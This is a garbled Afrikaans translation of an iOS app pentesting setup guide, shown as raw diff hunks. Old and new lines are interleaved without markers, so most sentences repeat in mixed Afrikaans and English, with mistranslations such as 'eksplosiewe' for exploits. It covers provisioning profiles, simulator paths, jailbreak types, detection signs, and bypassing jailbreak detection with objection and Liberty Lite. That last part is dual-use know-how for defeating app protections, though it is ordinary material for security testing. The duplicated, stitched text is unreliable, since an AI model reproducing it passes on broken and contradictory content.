Begin in Xcode 7.2 het Apple 'n opsie verskaf om 'n **gratis iOS ontwikkeling provisioning profiel** te skep wat jou toelaat om jou toepassing op 'n werklike iPhone te skryf en te toets. Gaan na _Xcode_ --> _Voorkeure_ --> _Rekeninge_ --> _+_ (Voeg nuwe Appli ID by jou inligting) --> _Klik op die Apple ID wat geskep is_ --> _Bestuur Sertifikate_ --> _+_ (Apple Ontwikkeling) --> _Klaar_\
\_\_Dan, om jou toepassing op jou iPhone te loop, moet jy eers **aangee dat die iPhone die rekenaar moet vertrou.** Dan kan jy probeer om **die toepassing op die mobiele toestel vanaf Xcode te loop,** maar 'n fout sal verskyn. Gaan dus na _Instellings_ --> _Algemeen_ --> _Profiele en Toestuurbestuur_ --> Kies die onbetroubare profiel en klik "**Vertrou**".
Let daarop dat **toepassings wat deur dieselfde teken sertifikaat geteken is, hulpbronne op 'n veilige manier kan deel, soos sleutelhouer items**.
@ -22,14 +22,14 @@ Die provisioning profiele word binne die foon gestoor in **`/Library/MobileDevic
Die eerste ding wat jy moet weet is dat **om 'n pentest binne 'n simulator uit te voer baie meer beperk sal wees as om dit op 'n gejailbreakte toestel te doen**.
Al die gereedskap wat benodig word om 'n iOS app te bou en te ondersteun is **slegs amptelik ondersteun op Mac OS**.\
Al die gereedskap wat benodig word om 'n iOS app te bou en te ondersteun, word **slegs amptelik op Mac OS ondersteun**.\
Apple se de facto gereedskap vir die skep/debugging/instrumentering van iOS toepassings is **Xcode**. Dit kan gebruik word om ander komponente soos **simulators** en verskillende **SDK** **weergawe** wat benodig word om jou app te bou en **te toets** af te laai.\
Dit word sterk aanbeveel om **Xcode** van die **amptelike app winkel** af te laai. Ander weergawes mag malware dra.
Die simulator lêers kan gevind word in `/Users/<username>/Library/Developer/CoreSimulator/Devices`
Om die simulator te open, hardloop Xcode, druk dan in die _Xcode tab_ --> _Open Ontwikkelaar gereedskap_ --> _Simulator_\
\_\_In die volgende beeld kan jy deur op "iPod touch \[...\]" te klik 'n ander toestel kies om op te toets:
\_\_In die volgende beeld kan jy deur op "iPod touch \[...]" te klik, 'n ander toestel kies om op te toets:
![](<../../images/image (270).png>)
@ -37,52 +37,56 @@ Om die simulator te open, hardloop Xcode, druk dan in die _Xcode tab_ --> _Open
### Toepassings in die Simulator
Binne `/Users/<username>/Library/Developer/CoreSimulator/Devices` kan jy al die **geïnstalleerde simulators** vind. As jy toegang wil hê tot die lêers van 'n toepassing wat binne een van die emulators geskep is, kan dit moeilik wees om te weet **in watter een die app geïnstalleer is**. 'n Vinige manier om **die korrekte UID te vind** is om die app in die simulator te laat loop en uit te voer:
Binne `/Users/<username>/Library/Developer/CoreSimulator/Devices` kan jy al die **geïnstalleerde simulators** vind. As jy toegang wil hê tot die lêers van 'n toepassing wat binne een van die emulators geskep is, kan dit moeilik wees om te weet **in watter een die app geïnstalleer is**. 'n Vinige manier om die **regte UID te vind** is om die app in die simulator te voer en uit te voer:
```bash
xcrun simctl list | grep Booted
iPhone 8 (BF5DA4F8-6BBE-4EA0-BA16-7E3AFD16C06C) (Booted)
```
Sodra jy die UID ken, kan die toepassings wat binne dit geïnstalleer is, gevind word in `/Users/<username>/Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application`
Once you know the UID the apps installed within it can be found in `/Users/<username>/Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application`
Ehowever, verrassend genoeg sal jy die toepassing hier nie vind nie. Jy moet toegang verkry tot `/Users/<username>/Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/`
However, surprisingly you won't find the application here. You need to access `/Users/<username>/Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/`
En in hierdie gids kan jy **die pakket van die toepassing vind.**
And in this folder you can **find the package of the application.**
## Emulator
Corellium is die enigste publiek beskikbare iOS-emulator. Dit is 'n ondernemings SaaS-oplossing met 'n per gebruiker lisensiemodel en bied nie enige proeflisensie aan nie.
Corellium is the only publicly available iOS emulator. Dit is 'n ondernemings SaaS-oplossing met 'n per gebruiker lisensie model en bied nie enige proeflisensie aan nie.
## Geen Jailbreak nodig
## No Jailbreak needed
Kyk na hierdie blogpos oor hoe om 'n iOS-toepassing in 'n **nie-jailbroken toestel** te pentest: [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed)
Check this blog post about how to pentest an iOS application in a **non jailbroken device**:
{{#ref}}
ios-pentesting-without-jailbreak.md
{{#endref}}
## Jailbreaking
Apple vereis streng dat die kode wat op die iPhone loop, **onderteken moet wees deur 'n sertifikaat wat deur Apple uitgereik is**. **Jailbreaking** is die proses om aktief **soos beperkings te omseil** en ander sekuriteitsbeheermaatreëls wat deur die OS in plek gestel is. Daarom, sodra die toestel gejailbreak is, word die **integriteitskontrole** wat verantwoordelik is vir die kontrole van toepassings wat geïnstalleer word, gepatch sodat dit **omseil** word.
Apple vereis streng dat die kode wat op die iPhone loop, **onderteken moet wees deur 'n sertifikaat wat deur Apple uitgereik is**. **Jailbreaking** is die proses om aktief **soos beperkings** en ander sekuriteitsbeheermaatreëls wat deur die OS in plek gestel is, te **omseil**. Daarom, sodra die toestel gejailbreak is, word die **integriteitskontrole** wat verantwoordelik is vir die kontrole van geïnstalleerde toepassings, gepatch, sodat dit **omseil** word.
> [!NOTE]
> Anders as Android, **kan jy nie na "Ontwikkelaarsmodus" oorskakel** in iOS om ongetekende/onbetroubare kode op die toestel te loop nie.
> Anders as Android, **kan jy nie na "Ontwikkelaarsmodus"** in iOS oorgaan om ongetekende/onbetroubare kode op die toestel te loop nie.
### Android Rooting vs. iOS Jailbreaking
Terwyl dit dikwels vergelyk word, is **rooting** op Android en **jailbreaking** op iOS fundamenteel verskillende prosesse. Rooting Android-toestelle kan behels **die installering van die `su` binêre** of **die vervanging van die stelsel met 'n ge-rootte pasgemaakte ROM**, wat nie noodwendig eksplosiewe benodig nie as die bootloader ontgrendel is. **Flashing pasgemaakte ROMs** vervang die toestel se OS na die ontgrendeling van die bootloader, wat soms 'n eksplosiewe benodig.
Terwyl dit dikwels vergelyk word, is **rooting** op Android en **jailbreaking** op iOS fundamenteel verskillende prosesse. Rooting Android-toestelle kan behels **die installering van die `su` binêre** of **die vervanging van die stelsel met 'n ge-rootte pasgemaakte ROM**, wat nie noodwendig eksplosiewe benodig nie as die bootloader ontgrendel is. **Flashing custom ROMs** vervang die toestel se OS na die ontgrendeling van die bootloader, wat soms 'n eksplosiewe benodig.
In teenstelling hiermee kan iOS-toestelle nie pasgemaakte ROMs flits nie weens die bootloader se beperking om slegs Apple-ondertekende beelde te begin. **Jailbreaking iOS** is daarop gemik om Apple se kodeondertekening beskerming te omseil om ongetekende kode te laat loop, 'n proses wat bemoeilik word deur Apple se deurlopende sekuriteitsverbeterings.
### Jailbreaking Uitdagings
### Jailbreaking Challenges
Jailbreaking iOS word al hoe moeiliker namate Apple kwesbaarhede vinnig patch. **Downgrading iOS** is slegs vir 'n beperkte tyd moontlik na 'n vrystelling, wat jailbreaking 'n tydsensitive saak maak. Toestelle wat vir sekuriteitstoetsing gebruik word, moet nie opgedateer word nie, tensy her-jailbreaking gewaarborg word.
Jailbreaking iOS word al hoe moeiliker namate Apple kwesbaarhede vinnig patch. **Downgrading iOS** is slegs vir 'n beperkte tyd na 'n vrystelling moontlik, wat jailbreaking 'n tydsensitive saak maak. Toestelle wat vir sekuriteitstoetsing gebruik word, moet nie opgedateer word nie, tensy her-jailbreaking gewaarborg word.
iOS-opdaterings word beheer deur 'n **uitdaging-respons meganisme** (SHSH blobs), wat installasie slegs toelaat vir Apple-ondertekende antwoorde. Hierdie meganisme, bekend as 'n "onderteken venster", beperk die vermoë om OTA firmware-pakkette te stoor en later te gebruik. Die [IPSW Downloads website](https://ipsw.me) is 'n hulpbron om huidige onderteken vensters te kontroleer.
### Jailbreak Variëteite
### Jailbreak Varieties
- **Tethered jailbreaks** vereis 'n rekenaarverbinding vir elke herbegin.
- **Semi-tethered jailbreaks** laat boot in nie-jailbroken modus toe sonder 'n rekenaar.
- **Semi-tethered jailbreaks** laat boot in nie-gejailbreakte modus toe sonder 'n rekenaar.
- **Semi-untethered jailbreaks** vereis handmatige her-jailbreaking sonder die behoefte aan 'n rekenaar.
- **Untethered jailbreaks** bied 'n permanente jailbreak-oplossing sonder die behoefte aan her-toepassing.
### Jailbreaking Gereedskap en Hulpbronne
### Jailbreaking Tools and Resources
Jailbreaking gereedskap verskil volgens iOS weergawe en toestel. Hulpbronne soos [Can I Jailbreak?](https://canijailbreak.com), [The iPhone Wiki](https://www.theiphonewiki.com), en [Reddit Jailbreak](https://www.reddit.com/r/jailbreak/) bied opdaterings inligting. Voorbeelde sluit in:
@ -92,36 +96,36 @@ Jailbreaking gereedskap verskil volgens iOS weergawe en toestel. Hulpbronne soos
Die aanpassing van jou toestel dra risiko's, en jailbreaking moet met omsigtigheid benader word.
### Jailbreaking Voordele en Risiko's
### Jailbreaking Benefits and Risks
Jailbreaking **verwyder OS-geplaasde sandboxing**, wat toelaat dat toepassings toegang tot die hele lêerstelsel het. Hierdie vryheid stel die installasie van nie-goedgekeurde toepassings en toegang tot meer API's moontlik. Tog, vir gewone gebruikers, word jailbreaking **nie aanbeveel nie** weens potensiële sekuriteitsrisiko's en toestel onstabiliteit.
Jailbreaking **verwyder OS-opgelegde sandboxing**, wat toelaat dat toepassings toegang tot die hele lêerstelsel het. Hierdie vryheid stel die installasie van nie-goedgekeurde toepassings en toegang tot meer API's in staat. Tog, vir gewone gebruikers, word jailbreaking **nie aanbeveel** weens potensiële sekuriteitsrisiko's en toestel onstabiliteit nie.
### **Na Jailbreaking**
### **After Jailbreaking**
{{#ref}}
basic-ios-testing-operations.md
{{#endref}}
### **Jailbreak Detectie**
### **Jailbreak Detection**
**Verskeie toepassings sal probeer om te detecteer of die mobiele toestel gejailbreak is en in daardie geval sal die toepassing nie loop nie**
- Na jailbreaking word 'n iOS **lêers en vouers gewoonlik geïnstalleer**, hierdie kan gesoek word om te bepaal of die toestel gejailbreak is.
- In 'n gejailbreak toestel kry toepassings **lees/skryf toegang tot nuwe lêers** buite die sandbox
- In 'n gejailbreakte toestel kry toepassings **lees/skryf toegang tot nuwe lêers** buite die sandbox
- Sommige **API** **oproepen** sal **anders optree**
- Die teenwoordigheid van die **OpenSSH** diens
- Oproep van `/bin/sh` sal **1** teruggee in plaas van 0
- Die oproep van `/bin/sh` sal **1** teruggee in plaas van 0
**Meer inligting oor hoe om jailbreaking te detecteer** [**hier**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**.**
Jy kan probeer om hierdie detections te vermy deur **objection's** `ios jailbreak disable` te gebruik.
You can try to avoid this detections using **objection's** `ios jailbreak disable`
## **Jailbreak Detectie Omseiling**
## **Jailbreak Detection Bypass**
- Jy kan probeer om hierdie detections te vermy deur **objection's** `ios jailbreak disable` te gebruik.
- Jy kan ook die hulpmiddel **Liberty Lite** (https://ryleyangus.com/repo/) installeer. Sodra die repo bygevoeg is, moet die toepassing in die Soek tab verskyn.
- You can try to avoid this detections using **objection's** `ios jailbreak disable`
- You could also install the tool **Liberty Lite** (https://ryleyangus.com/repo/). Once the repo is added, the app should appear in the Search tab
## Verwysings
## References
- [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/)